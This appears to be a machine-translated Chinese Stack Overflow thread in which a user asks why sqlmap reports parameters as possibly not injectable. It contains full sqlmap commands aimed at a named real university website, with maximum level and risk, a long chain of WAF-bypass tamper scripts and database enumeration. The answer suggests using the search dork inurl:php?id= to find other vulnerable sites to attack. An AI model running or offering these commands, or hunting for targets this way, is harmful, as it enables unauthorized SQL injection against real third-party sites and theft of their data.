【问题标题】:Sqlmap parameter "might not be injectable"Sqlmap 参数“可能无法注入”
【发布时间】:2015-10-06 18:38:51
【问题描述】:

我从 sqlmap 开始,我有以下疑问: 当我尝试使用这个 sn-p 使用 sqlmap(试图绕过 waf)时:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?option=com_newsfeeds&view=newsfeed&id=1&feedid=1&Itemid=18" --dbs --dbms=mysql --time-sec=10 --hex --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

或者这个:

sqlmap.py -u "http://prefing.umsa.edu.bo/index.php?view=article&catid=35:pagina-principal&id=44:inicio-central&format=pdf" --dbs --dbms=mysql --time-sec=10 --hex --string --regexp --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

我看到控制台中出现了:

[WARNING] 启发式(基本)测试表明 GET 参数 'option' 可能不可注入 [警告] 启发式(基本)测试表明 GET 参数“视图”可能无法注入

还试图在我的网站内找到一个类似于:http://www.cafe53rd.com/menu.php?item_id=3 的网址 因为我检查了这种 url 最容易访问,但我无法在我正在审核的网站上找到它。

在下面的Site ("http://prefing...")中正确的代码是什么

对不起,我的英语不好。 非常感谢。

【问题讨论】:

    标签: sql-injection sqlmap


    【解决方案1】:

    这个错误只是表明正在执行的注射技术类型没有给出积极的响应。 我已经面对它并通过获取备用链接解决了它。 我建议找到一些其他易受攻击的链接,使用搜索 inurl:php?id= 然后在 sqlmap 中插入链接。

    【讨论】:

      猜你喜欢
      • 2017-05-20
      • 2023-03-31
      • 2013-07-12
      • 2015-12-10
      • 2023-03-24
      • 2017-03-15
      • 2021-11-20
      • 2017-09-17
      • 2013-03-17
      相关资源
      最近更新 更多